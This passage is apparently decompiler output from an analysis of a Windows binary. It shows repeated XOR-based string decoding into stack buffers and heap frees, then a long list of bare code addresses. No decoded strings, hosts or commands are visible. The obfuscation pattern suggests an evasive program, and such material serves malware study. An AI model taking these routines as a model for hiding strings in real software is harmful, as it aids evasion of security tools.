				 *((long long*)(_t2470 + 0x100)) = 7;
				 *(_t2470 + 0x30) = 0x68dc46ef;
				 *(_t2470 + 0x30) = 0xe6584df4;
				0x68b7d8b0();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2B5D ^  *0x4297C87EE6584DF4;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b861d1;
				E00007FF77FF768BEFD87(0xe6584df4, 0);
				_t2575 = _t2470 + 0x210;
				 *_t2575 = 0xe6584df4;
				 *((long long*)(_t2575 + 8)) = 0x68dc2b5d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2575 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b8625f;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b8625f;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db667a;
				 *(_t2470 + 0x30) = 0x97be8f0b;
				_t2223 =  *(_t2470 + 0x30);
				0x68b7c8e4();
				_t1261 = E00007FF77FF768BEFD87(0x97be8f0b,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x97be8f0b;
				 *(_t2470 + 0xf8) = _t2223;
				_t2223[0] =  *0x33C2156597BE8F0F & 0x0000ffff ^ 0x00004cc5;
				 *_t2223 =  *0x97be8f0b;
				 *((long long*)(_t2470 + 0x100)) = 6;
				 *(_t2470 + 0x30) = 0x68dbf7d8;
				 *(_t2470 + 0x30) = 0x57c508d2;
				E00007FF77FF768B7D384(_t1261, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2B7D ^  *0xF8D325B357C508D2;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8630d;
				E00007FF77FF768BEFD87(0x57c508d2, 0);
				_t2576 = _t2470 + 0x210;
				 *_t2576 = 0x57c508d2;
				 *((long long*)(_t2576 + 8)) = 0x68dc2b7d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2576 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b8639b;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b8639b;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dbe607;
				 *(_t2470 + 0x30) = 0x712c1c8f;
				_t2227 =  *(_t2470 + 0x30);
				E00007FF77FF768B7E304(_t2227);
				E00007FF77FF768BEFD87(0x712c1c8f,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x712c1c8f;
				 *(_t2470 + 0xf8) = _t2227;
				_t2227[0] =  *0x9E05AFFD712C1C93 & 0x0000ffff ^ 0x000036bd;
				 *_t2227 =  *0x712c1c8f;
				 *((long long*)(_t2470 + 0x100)) = 6;
				 *(_t2470 + 0x30) = 0x68db9b3d;
				 *(_t2470 + 0x30) = 0xe23316d8;
				0x68b7c65d();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2B9D ^  *0x6210CA38E23316D8;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b86449;
				E00007FF77FF768BEFD87(0xe23316d8, 0);
				_t2577 = _t2470 + 0x210;
				 *_t2577 = 0xe23316d8;
				 *((long long*)(_t2577 + 8)) = 0x68dc2b9d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2577 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b864d7;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b864d7;
				_t1267 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db6404;
				 *(_t2470 + 0x30) = 0x3cc9fb2e;
				_t2231 =  *(_t2470 + 0x30);
				E00007FF77FF768B7BEA6(_t1267, 0,  *(_t2470 + 0x30), _t2231);
				_t1750 = _t1807 << 0x30;
				_t1269 = E00007FF77FF768BEFD87(_t1750,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = _t1750;
				 *(_t2470 + 0xf8) = _t2231;
				_t2231[0] = ( *0x7593BCC93CC9FB34 & 0x000000ff ^ 0x0000008d) & 0x000000ff;
				 *_t2231 =  *0x3cc9fb2e;
				_t2231[0] =  *0x7593BCC93CC9FB32 & 0x0000ffff ^ 0x000015d0;
				 *((long long*)(_t2470 + 0x100)) = 7;
				 *(_t2470 + 0x30) = 0x68dba22d;
				 *(_t2470 + 0x30) = 0xff9ea051;
				E00007FF77FF768B7E15C(_t1269, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2BBD ^  *0x21DF08BAFF9EA051;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b865a4;
				E00007FF77FF768BEFD87(0xff9ea051, 0);
				_t2578 = _t2470 + 0x210;
				 *_t2578 = 0xff9ea051;
				 *((long long*)(_t2578 + 8)) = 0x68dc2bbd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2578 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b86632;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b86632;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dbba7b;
				 *(_t2470 + 0x30) = 0xe8eb8cc6;
				_t2235 =  *(_t2470 + 0x30);
				0x68b7c5be();
				_t1273 = E00007FF77FF768BEFD87(0xe8eb8cc6,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xe8eb8cc6;
				 *(_t2470 + 0xf8) = _t2235;
				 *_t2235 = 0xb89fcbe7 ^  *0xe8eb8cc6;
				_t2235[1] = 0x27ae80ca ^  *0x72369D9BE8EB8CCE;
				_t2235[1] =  *0x72369D9BE8EB8CD2 ^ 0x00000031;
				 *((long long*)(_t2470 + 0x100)) = 0xd;
				 *(_t2470 + 0x30) = 0x68dbc1b3;
				 *(_t2470 + 0x30) = 0xe4a3e0bb;
				E00007FF77FF768B7E0F6(_t1273, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2BDD ^  *0x6D7FDC16E4A3E0BB;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b866eb;
				E00007FF77FF768BEFD87(0xe4a3e0bb, 0);
				_t2579 = _t2470 + 0x210;
				 *_t2579 = 0xe4a3e0bb;
				 *((long long*)(_t2579 + 8)) = 0x68dc2bdd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2579 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b86779;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b86779;
				_t1276 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dc05fc;
				 *(_t2470 + 0x30) = 0x402667f0;
				_t2239 =  *(_t2470 + 0x30);
				E00007FF77FF768B7CAF7(_t1276, 0,  *(_t2470 + 0x30), _t2239);
				E00007FF77FF768BEFD87(0x402667f0,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x402667f0;
				 *(_t2470 + 0xf8) = _t2239;
				_t2239[0] =  *0x37DD570D402667F4 ^ 0x000000a0;
				 *_t2239 = 0x95c71374;
				 *((long long*)(_t2470 + 0x100)) = 5;
				 *(_t2470 + 0x30) = 0x68dc0e33;
			}



















































































































































































                                                                                          0x7ff768b834ba
                                                                                          0x7ff768b834c2
                                                                                          0x7ff768b834c5
                                                                                          0x7ff768b834cd
                                                                                          0x7ff768b834d1
                                                                                          0x7ff768b834e1
                                                                                          0x7ff768b834e9
                                                                                          0x7ff768b834f0
                                                                                          0x7ff768b834f5
                                                                                          0x7ff768b8350b
                                                                                          0x7ff768b8351a
                                                                                          0x7ff768b83528
                                                                                          0x7ff768b83532
                                                                                          0x7ff768b83535
                                                                                          0x7ff768b8353a
                                                                                          0x7ff768b83544
                                                                                          0x7ff768b83556
                                                                                          0x7ff768b8355e
                                                                                          0x7ff768b83561
                                                                                          0x7ff768b8356a
                                                                                          0x7ff768b83580
                                                                                          0x7ff768b83593
                                                                                          0x7ff768b83599
                                                                                          0x7ff768b835a3
                                                                                          0x7ff768b835ab
                                                                                          0x7ff768b835ad
                                                                                          0x7ff768b835b9
                                                                                          0x7ff768b835c7
                                                                                          0x7ff768b835ca
                                                                                          0x7ff768b835d7
                                                                                          0x7ff768b835dc
                                                                                          0x7ff768b835df
                                                                                          0x7ff768b835e4
                                                                                          0x7ff768b835e7
                                                                                          0x7ff768b835ee
                                                                                          0x7ff768b835f5
                                                                                          0x7ff768b835f8
                                                                                          0x7ff768b835fb
                                                                                          0x7ff768b835ff
                                                                                          0x7ff768b83603
                                                                                          0x7ff768b83607
                                                                                          0x7ff768b8360b
                                                                                          0x7ff768b83614
                                                                                          0x7ff768b83621
                                                                                          0x7ff768b83625
                                                                                          0x7ff768b8362a
                                                                                          0x7ff768b83632
                                                                                          0x7ff768b8363a
                                                                                          0x7ff768b8363e
                                                                                          0x7ff768b8364a
                                                                                          0x7ff768b83652
                                                                                          0x7ff768b8365a
                                                                                          0x7ff768b83662
                                                                                          0x7ff768b8366d
                                                                                          0x7ff768b83673
                                                                                          0x7ff768b8367d
                                                                                          0x7ff768b8368a
                                                                                          0x7ff768b83697
                                                                                          0x7ff768b836b3
                                                                                          0x7ff768b836bb
                                                                                          0x7ff768b836c2
                                                                                          0x7ff768b836d5
                                                                                          0x7ff768b836dd
                                                                                          0x7ff768b836ed
                                                                                          0x7ff768b836f8
                                                                                          0x7ff768b836fe
                                                                                          0x7ff768b83706
                                                                                          0x7ff768b8370e
                                                                                          0x7ff768b83713
                                                                                          0x7ff768b83718
                                                                                          0x7ff768b83721
                                                                                          0x7ff768b83726
                                                                                          0x7ff768b8372e
                                                                                          0x7ff768b83736
                                                                                          0x7ff768b8373e
                                                                                          0x7ff768b83746
                                                                                          0x7ff768b8374e
                                                                                          0x7ff768b8375c
                                                                                          0x7ff768b83762
                                                                                          0x7ff768b83762
                                                                                          0x7ff768b8376e
                                                                                          0x7ff768b83771
                                                                                          0x7ff768b83779
                                                                                          0x7ff768b83781
                                                                                          0x7ff768b83791
                                                                                          0x7ff768b83795
                                                                                          0x7ff768b8379c
                                                                                          0x7ff768b837a2
                                                                                          0x7ff768b837a8
                                                                                          0x7ff768b837ad
                                                                                          0x7ff768b837b2
                                                                                          0x7ff768b837b8
                                                                                          0x7ff768b837bd
                                                                                          0x7ff768b837c2
                                                                                          0x7ff768b837c7
                                                                                          0x7ff768b837d5
                                                                                          0x7ff768b837e1
                                                                                          0x7ff768b837e7
                                                                                          0x7ff768b837fa
                                                                                          0x7ff768b837fa
                                                                                          0x7ff768b83810
                                                                                          0x7ff768b8381b
                                                                                          0x7ff768b83838
                                                                                          0x7ff768b83845
                                                                                          0x7ff768b83850
                                                                                          0x7ff768b83858
                                                                                          0x7ff768b83860
                                                                                          0x7ff768b8386e
                                                                                          0x7ff768b83873
                                                                                          0x7ff768b83886
                                                                                          0x7ff768b83889
                                                                                          0x7ff768b8388e
                                                                                          0x7ff768b83897
                                                                                          0x7ff768b838a1
                                                                                          0x7ff768b838a5
                                                                                          0x7ff768b838a9
                                                                                          0x7ff768b838ad
                                                                                          0x7ff768b838b1
                                                                                          0x7ff768b838b9
                                                                                          0x7ff768b838c1
                                                                                          0x7ff768b838c9
                                                                                          0x7ff768b838d5
                                                                                          0x7ff768b838dd
                                                                                          0x7ff768b838f5
                                                                                          0x7ff768b838fa
                                                                                          0x7ff768b83907
                                                                                          0x7ff768b8390d
                                                                                          0x7ff768b8391a
                                                                                          0x7ff768b8392a
                                                                                          0x7ff768b8392f
                                                                                          0x7ff768b83933
                                                                                          0x7ff768b83937
                                                                                          0x7ff768b83940
                                                                                          0x7ff768b83948
                                                                                          0x7ff768b83954
                                                                                          0x7ff768b8395f
                                                                                          0x7ff768b8396a
                                                                                          0x7ff768b83970
                                                                                          0x7ff768b83978
                                                                                          0x7ff768b8397e
                                                                                          0x7ff768b83982
                                                                                          0x7ff768b8398b
                                                                                          0x7ff768b83993
                                                                                          0x7ff768b8399b
                                                                                          0x7ff768b839a0
                                                                                          0x7ff768b839a4
                                                                                          0x7ff768b839b0
                                                                                          0x7ff768b839c0
                                                                                          0x7ff768b839cd
                                                                                          0x7ff768b839dd
                                                                                          0x7ff768b83a0a
                                                                                          0x7ff768b83a17
                                                                                          0x7ff768b83a1f
                                                                                          0x7ff768b83a27
                                                                                          0x7ff768b83a32
                                                                                          0x7ff768b83a4d
                                                                                          0x7ff768b83a5d
                                                                                          0x7ff768b83a68
                                                                                          0x7ff768b83a6e
                                                                                          0x7ff768b83a73
                                                                                          0x7ff768b83a78
                                                                                          0x7ff768b83a81
                                                                                          0x7ff768b83a85
                                                                                          0x7ff768b83a8d
                                                                                          0x7ff768b83a95
                                                                                          0x7ff768b83a9d
                                                                                          0x7ff768b83aab
                                                                                          0x7ff768b83ab1
                                                                                          0x7ff768b83ab9
                                                                                          0x7ff768b83ac1
                                                                                          0x7ff768b83ac1
                                                                                          0x7ff768b83ac5
                                                                                          0x7ff768b83ac8
                                                                                          0x7ff768b83ad0
                                                                                          0x7ff768b83ad7
                                                                                          0x7ff768b83add
                                                                                          0x7ff768b83ae9
                                                                                          0x7ff768b83aed
                                                                                          0x7ff768b83af1
                                                                                          0x7ff768b83b01
                                                                                          0x7ff768b83b04
                                                                                          0x7ff768b83b09
                                                                                          0x7ff768b83b0e
                                                                                          0x7ff768b83b1c
                                                                                          0x7ff768b83b28
                                                                                          0x7ff768b83b3e
                                                                                          0x7ff768b83b59
                                                                                          0x7ff768b83b76
                                                                                          0x7ff768b83b83
                                                                                          0x7ff768b83b8e
                                                                                          0x7ff768b83b96
                                                                                          0x7ff768b83b9e
                                                                                          0x7ff768b83bac
                                                                                          0x7ff768b83bb1
                                                                                          0x7ff768b83bd1
                                                                                          0x7ff768b83bd6
                                                                                          0x7ff768b83bde
                                                                                          0x7ff768b83bf1
                                                                                          0x7ff768b83bf4
                                                                                          0x7ff768b83bfc
                                                                                          0x7ff768b83c04
                                                                                          0x7ff768b83c07
                                                                                          0x7ff768b83c15
                                                                                          0x7ff768b83c1d
                                                                                          0x7ff768b83c25
                                                                                          0x7ff768b83c45
                                                                                          0x7ff768b83c50
                                                                                          0x7ff768b83c5d
                                                                                          0x7ff768b83c61
                                                                                          0x7ff768b83c6a
                                                                                          0x7ff768b83c6f
                                                                                          0x7ff768b83c87
                                                                                          0x7ff768b83c8e
                                                                                          0x7ff768b83c93
                                                                                          0x7ff768b83c98
                                                                                          0x7ff768b83ca2
                                                                                          0x7ff768b83ca6
                                                                                          0x7ff768b83caa
                                                                                          0x7ff768b83cae
                                                                                          0x7ff768b83cb2
                                                                                          0x7ff768b83cba
                                                                                          0x7ff768b83cc2
                                                                                          0x7ff768b83cca
                                                                                          0x7ff768b83cd6
                                                                                          0x7ff768b83ce3
                                                                                          0x7ff768b83ceb
                                                                                          0x7ff768b83cf8
                                                                                          0x7ff768b83d06
                                                                                          0x7ff768b83d43
                                                                                          0x7ff768b83d48
                                                                                          0x7ff768b83d50
                                                                                          0x7ff768b83d58
                                                                                          0x7ff768b83d63
                                                                                          0x7ff768b83d76
                                                                                          0x7ff768b83d8b
                                                                                          0x7ff768b83d96
                                                                                          0x7ff768b83d9c
                                                                                          0x7ff768b83da1
                                                                                          0x7ff768b83da6
                                                                                          0x7ff768b83db2
                                                                                          0x7ff768b83db6
                                                                                          0x7ff768b83dbe
                                                                                          0x7ff768b83dc6
                                                                                          0x7ff768b83dce
                                                                                          0x7ff768b83ddc
                                                                                          0x7ff768b83de2
                                                                                          0x7ff768b83dea
                                                                                          0x7ff768b83dea
                                                                                          0x7ff768b83dee
                                                                                          0x7ff768b83df1
                                                                                          0x7ff768b83df9
                                                                                          0x7ff768b83dff
                                                                                          0x7ff768b83e04
                                                                                          0x7ff768b83e08
                                                                                          0x7ff768b83e0c
                                                                                          0x7ff768b83e0f
                                                                                          0x7ff768b83e14
                                                                                          0x7ff768b83e1b
                                                                                          0x7ff768b83e26
                                                                                          0x7ff768b83e2a
                                                                                          0x7ff768b83e2e
                                                                                          0x7ff768b83e33
                                                                                          0x7ff768b83e38
                                                                                          0x7ff768b83e43
                                                                                          0x7ff768b83e49
                                                                                          0x7ff768b83e4e
                                                                                          0x7ff768b83e56
                                                                                          0x7ff768b83e5b
                                                                                          0x7ff768b83e60
                                                                                          0x7ff768b83e68
                                                                                          0x7ff768b83e70
                                                                                          0x7ff768b83e78
                                                                                          0x7ff768b83e80
                                                                                          0x7ff768b83e90
                                                                                          0x7ff768b83e9b
                                                                                          0x7ff768b83ea3
                                                                                          0x7ff768b83eab
                                                                                          0x7ff768b83eb9
                                                                                          0x7ff768b83ebe
                                                                                          0x7ff768b83ee6
                                                                                          0x7ff768b83eeb
                                                                                          0x7ff768b83ef3
                                                                                          0x7ff768b83f06
                                                                                          0x7ff768b83f09
                                                                                          0x7ff768b83f0e
                                                                                          0x7ff768b83f17
                                                                                          0x7ff768b83f21
                                                                                          0x7ff768b83f25
                                                                                          0x7ff768b83f29
                                                                                          0x7ff768b83f2d
                                                                                          0x7ff768b83f31
                                                                                          0x7ff768b83f39
                                                                                          0x7ff768b83f41
                                                                                          0x7ff768b83f49
                                                                                          0x7ff768b83f55
                                                                                          0x7ff768b83f62
                                                                                          0x7ff768b83f67
                                                                                          0x7ff768b83f74
                                                                                          0x7ff768b83f7a
                                                                                          0x7ff768b83f8b
                                                                                          0x7ff768b83f93
                                                                                          0x7ff768b83f96
                                                                                          0x7ff768b83f9e
                                                                                          0x7ff768b83fae
                                                                                          0x7ff768b83fb2
                                                                                          0x7ff768b83fb6
                                                                                          0x7ff768b83fbf
                                                                                          0x7ff768b83fcf
                                                                                          0x7ff768b83fd7
                                                                                          0x7ff768b83fe1
                                                                                          0x7ff768b83fe5
                                                                                          0x7ff768b83fed
                                                                                          0x7ff768b83ff0
                                                                                          0x7ff768b83ff4
                                                                                          0x7ff768b83ffd
                                                                                          0x7ff768b84005
                                                                                          0x7ff768b8400a
                                                                                          0x7ff768b84012
                                                                                          0x7ff768b8401f
                                                                                          0x7ff768b84027
                                                                                          0x7ff768b8402d
                                                                                          0x7ff768b8403c
                                                                                          0x7ff768b84041
                                                                                          0x7ff768b84049
                                                                                          0x7ff768b84051
                                                                                          0x7ff768b8405c
                                                                                          0x7ff768b84069
                                                                                          0x7ff768b84087
                                                                                          0x7ff768b84095
                                                                                          0x7ff768b840b0
                                                                                          0x7ff768b840b5
                                                                                          0x7ff768b840b9
                                                                                          0x7ff768b840bc
                                                                                          0x7ff768b840d0
                                                                                          0x7ff768b840e6
                                                                                          0x7ff768b840fc
                                                                                          0x7ff768b84101
                                                                                          0x7ff768b84106
                                                                                          0x7ff768b84125
                                                                                          0x7ff768b84158
                                                                                          0x7ff768b8415d
                                                                                          0x7ff768b84165
                                                                                          0x7ff768b84179
                                                                                          0x7ff768b84186
                                                                                          0x7ff768b84193
                                                                                          0x7ff768b8419b
                                                                                          0x7ff768b841a9
                                                                                          0x7ff768b841bf
                                                                                          0x7ff768b841c7
                                                                                          0x7ff768b841cd
                                                                                          0x7ff768b841da
                                                                                          0x7ff768b841df
                                                                                          0x7ff768b841eb
                                                                                          0x7ff768b841fb
                                                                                          0x7ff768b84205
                                                                                          0x7ff768b84215
                                                                                          0x7ff768b84222
                                                                                          0x7ff768b8422f
                                                                                          0x7ff768b84248
                                                                                          0x7ff768b8424d
                                                                                          0x7ff768b84250
                                                                                          0x7ff768b84258
                                                                                          0x7ff768b8426b
                                                                                          0x7ff768b84273
                                                                                          0x7ff768b8427b
                                                                                          0x7ff768b8428a
                                                                                          0x7ff768b8429e
                                                                                          0x7ff768b842a3
                                                                                          0x7ff768b842a8
                                                                                          0x7ff768b842cd
                                                                                          0x7ff768b842d2
                                                                                          0x7ff768b842da
                                                                                          0x7ff768b842e2
                                                                                          0x7ff768b842e5
                                                                                          0x7ff768b842e8
                                                                                          0x7ff768b842eb
                                                                                          0x7ff768b842fe
                                                                                          0x7ff768b84312
                                                                                          0x7ff768b8431c
                                                                                          0x7ff768b84321
                                                                                          0x7ff768b84326
                                                                                          0x7ff768b8433e
                                                                                          0x7ff768b84343
                                                                                          0x7ff768b84350
                                                                                          0x7ff768b84357
                                                                                          0x7ff768b8435c
                                                                                          0x7ff768b84364
                                                                                          0x7ff768b84367
                                                                                          0x7ff768b8436b
                                                                                          0x7ff768b84370
                                                                                          0x7ff768b84375
                                                                                          0x7ff768b84378
                                                                                          0x7ff768b8437c
                                                                                          0x7ff768b8439f
                                                                                          0x7ff768b843a4
                                                                                          0x7ff768b843ab
                                                                                          0x7ff768b843b6
                                                                                          0x7ff768b843c1
                                                                                          0x7ff768b843ce
                                                                                          0x7ff768b843e2
                                                                                          0x7ff768b843ec
                                                                                          0x7ff768b843f1
                                                                                          0x7ff768b843f4
                                                                                          0x7ff768b843fc
                                                                                          0x7ff768b84408
                                                                                          0x7ff768b84420
                                                                                          0x7ff768b8442c
                                                                                          0x7ff768b84461
                                                                                          0x7ff768b84474
                                                                                          0x7ff768b84478
                                                                                          0x7ff768b84492
                                                                                          0x7ff768b84496
                                                                                          0x7ff768b844a7
                                                                                          0x7ff768b844ad
                                                                                          0x7ff768b844b8
                                                                                          0x7ff768b844c4
                                                                                          0x7ff768b844c9
                                                                                          0x7ff768b844d1
                                                                                          0x7ff768b844d9
                                                                                          0x7ff768b844e1
                                                                                          0x7ff768b844eb
                                                                                          0x7ff768b844ee
                                                                                          0x7ff768b84501
                                                                                          0x7ff768b84515
                                                                                          0x7ff768b8451f
                                                                                          0x7ff768b84524
                                                                                          0x7ff768b84527
                                                                                          0x7ff768b8452c
                                                                                          0x7ff768b84549
                                                                                          0x7ff768b84556
                                                                                          0x7ff768b8455d
                                                                                          0x7ff768b84562
                                                                                          0x7ff768b8456a
                                                                                          0x7ff768b8456d
                                                                                          0x7ff768b84571
                                                                                          0x7ff768b84576
                                                                                          0x7ff768b8457b
                                                                                          0x7ff768b8457e
                                                                                          0x7ff768b84582
                                                                                          0x7ff768b845a5
                                                                                          0x7ff768b845b1
                                                                                          0x7ff768b845bc
                                                                                          0x7ff768b845c7
                                                                                          0x7ff768b845d4
                                                                                          0x7ff768b845e8
                                                                                          0x7ff768b845ed
                                                                                          0x7ff768b845f2
                                                                                          0x7ff768b8460f
                                                                                          0x7ff768b84614
                                                                                          0x7ff768b8461c
                                                                                          0x7ff768b84624
                                                                                          0x7ff768b84627
                                                                                          0x7ff768b8462a
                                                                                          0x7ff768b8463d
                                                                                          0x7ff768b84651
                                                                                          0x7ff768b8465b
                                                                                          0x7ff768b84660
                                                                                          0x7ff768b84663
                                                                                          0x7ff768b84668
                                                                                          0x7ff768b84685
                                                                                          0x7ff768b84692
                                                                                          0x7ff768b84699
                                                                                          0x7ff768b8469e
                                                                                          0x7ff768b846a6
                                                                                          0x7ff768b846a9
                                                                                          0x7ff768b846ad
                                                                                          0x7ff768b846b2
                                                                                          0x7ff768b846b7
                                                                                          0x7ff768b846ba
                                                                                          0x7ff768b846be
                                                                                          0x7ff768b846e1
                                                                                          0x7ff768b846ed
                                                                                          0x7ff768b846f8
                                                                                          0x7ff768b84703
                                                                                          0x7ff768b84710
                                                                                          0x7ff768b84724
                                                                                          0x7ff768b84729
                                                                                          0x7ff768b8472e
                                                                                          0x7ff768b8474b
                                                                                          0x7ff768b84750
                                                                                          0x7ff768b84758
                                                                                          0x7ff768b84760
                                                                                          0x7ff768b84763
                                                                                          0x7ff768b84766
                                                                                          0x7ff768b84779
                                                                                          0x7ff768b8478d
                                                                                          0x7ff768b84797
                                                                                          0x7ff768b8479c
                                                                                          0x7ff768b8479f
                                                                                          0x7ff768b847a4
                                                                                          0x7ff768b847c1
                                                                                          0x7ff768b847ce
                                                                                          0x7ff768b847d5
                                                                                          0x7ff768b847da
                                                                                          0x7ff768b847e2
                                                                                          0x7ff768b847e5
                                                                                          0x7ff768b847e9
                                                                                          0x7ff768b847ee
                                                                                          0x7ff768b847f3
                                                                                          0x7ff768b847f6
                                                                                          0x7ff768b847fa
                                                                                          0x7ff768b8481d
                                                                                          0x7ff768b84829
                                                                                          0x7ff768b84834
                                                                                          0x7ff768b8483f
                                                                                          0x7ff768b8484c
                                                                                          0x7ff768b84860
                                                                                          0x7ff768b84865
                                                                                          0x7ff768b8486a
                                                                                          0x7ff768b84881
                                                                                          0x7ff768b84886
                                                                                          0x7ff768b8488e
                                                                                          0x7ff768b84896
                                                                                          0x7ff768b84899
                                                                                          0x7ff768b848ac
                                                                                          0x7ff768b848c0
                                                                                          0x7ff768b848ca
                                                                                          0x7ff768b848cf
                                                                                          0x7ff768b848d2
                                                                                          0x7ff768b848d7
                                                                                          0x7ff768b848f4
                                                                                          0x7ff768b84901
                                                                                          0x7ff768b84908
                                                                                          0x7ff768b8490d
                                                                                          0x7ff768b84915
                                                                                          0x7ff768b84918
                                                                                          0x7ff768b8491c
                                                                                          0x7ff768b84921
                                                                                          0x7ff768b84926
                                                                                          0x7ff768b84929
                                                                                          0x7ff768b8492d
                                                                                          0x7ff768b84950
                                                                                          0x7ff768b8495c
                                                                                          0x7ff768b84967
                                                                                          0x7ff768b84972
                                                                                          0x7ff768b8497f
                                                                                          0x7ff768b84993
                                                                                          0x7ff768b84998
                                                                                          0x7ff768b8499d
                                                                                          0x7ff768b849ba
                                                                                          0x7ff768b849bf
                                                                                          0x7ff768b849c7
                                                                                          0x7ff768b849cf
                                                                                          0x7ff768b849d2
                                                                                          0x7ff768b849d5
                                                                                          0x7ff768b849e8
                                                                                          0x7ff768b849fc
                                                                                          0x7ff768b84a06
                                                                                          0x7ff768b84a0b
                                                                                          0x7ff768b84a0e
                                                                                          0x7ff768b84a13
                                                                                          0x7ff768b84a30
                                                                                          0x7ff768b84a3d
                                                                                          0x7ff768b84a44
                                                                                          0x7ff768b84a49
                                                                                          0x7ff768b84a51
                                                                                          0x7ff768b84a54
                                                                                          0x7ff768b84a58
                                                                                          0x7ff768b84a5d
                                                                                          0x7ff768b84a62
                                                                                          0x7ff768b84a65
                                                                                          0x7ff768b84a69
                                                                                          0x7ff768b84a8c
                                                                                          0x7ff768b84a98
                                                                                          0x7ff768b84aa3
                                                                                          0x7ff768b84aae
                                                                                          0x7ff768b84abb
                                                                                          0x7ff768b84acf
                                                                                          0x7ff768b84ad4
                                                                                          0x7ff768b84ad9
                                                                                          0x7ff768b84af0
                                                                                          0x7ff768b84af5
                                                                                          0x7ff768b84afd
                                                                                          0x7ff768b84b05
                                                                                          0x7ff768b84b08
                                                                                          0x7ff768b84b1b
                                                                                          0x7ff768b84b2f
                                                                                          0x7ff768b84b39
                                                                                          0x7ff768b84b3e
                                                                                          0x7ff768b84b41
                                                                                          0x7ff768b84b46
                                                                                          0x7ff768b84b63
                                                                                          0x7ff768b84b70
                                                                                          0x7ff768b84b77
                                                                                          0x7ff768b84b7c
                                                                                          0x7ff768b84b84
                                                                                          0x7ff768b84b87
                                                                                          0x7ff768b84b8b
                                                                                          0x7ff768b84b90
                                                                                          0x7ff768b84b95
                                                                                          0x7ff768b84b98
                                                                                          0x7ff768b84b9c
                                                                                          0x7ff768b84bbf
                                                                                          0x7ff768b84bcb
                                                                                          0x7ff768b84bd6
                                                                                          0x7ff768b84be1
                                                                                          0x7ff768b84bee
                                                                                          0x7ff768b84c02
                                                                                          0x7ff768b84c07
                                                                                          0x7ff768b84c0c
                                                                                          0x7ff768b84c2a
                                                                                          0x7ff768b84c2f
                                                                                          0x7ff768b84c37
                                                                                          0x7ff768b84c3f
                                                                                          0x7ff768b84c43
                                                                                          0x7ff768b84c45
                                                                                          0x7ff768b84c58
                                                                                          0x7ff768b84c6c
                                                                                          0x7ff768b84c76
                                                                                          0x7ff768b84c7b
                                                                                          0x7ff768b84c7e
                                                                                          0x7ff768b84c83
                                                                                          0x7ff768b84ca0
                                                                                          0x7ff768b84cad
                                                                                          0x7ff768b84cb4
                                                                                          0x7ff768b84cb9
                                                                                          0x7ff768b84cc1
                                                                                          0x7ff768b84cc4
                                                                                          0x7ff768b84cc8
                                                                                          0x7ff768b84ccd
                                                                                          0x7ff768b84cd2
                                                                                          0x7ff768b84cd5
                                                                                          0x7ff768b84cd9
                                                                                          0x7ff768b84cfc
                                                                                          0x7ff768b84d08
                                                                                          0x7ff768b84d13
                                                                                          0x7ff768b84d1e
